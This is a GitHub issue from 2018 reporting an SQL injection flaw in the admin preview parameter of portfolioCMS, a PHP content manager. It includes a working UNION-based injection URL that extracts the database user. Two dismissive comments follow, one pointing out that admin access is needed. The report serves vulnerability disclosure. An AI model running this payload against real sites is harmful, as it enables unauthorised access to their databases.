Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

portfolioCMS sql injection #2

Open
oyeahtime opened this issue Jun 11, 2018 · 2 comments
Open

portfolioCMS sql injection #2

oyeahtime opened this issue Jun 11, 2018 · 2 comments

Comments

@oyeahtime
Copy link
Owner

portfolioCMS is free open source file with PHP. There is a SQL injection vulnerability in the portfoliocms
We can get the source code :
https://github.com/teklynk/portfolioCMS

the SQL injection use like this:
1.install the portfoliocms,for example :http://127.0.0.1/cms/portfoliocms/admin/portfolio.php?preview=25
the sql injection payload:
http://127.0.0.1/cms/portfoliocms/admin/portfolio.php?preview=25' and 1=2 union all select 1,user() %23
image
@unh3x
Copy link

unh3x commented Jun 19, 2018

Need admin authority? It is too tasteless

@ghost
Copy link

ghost commented Jul 6, 2018

垃圾cms, 垃圾注入, 您不觉得您是来搞笑的吗?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@oyeahtime @unh3x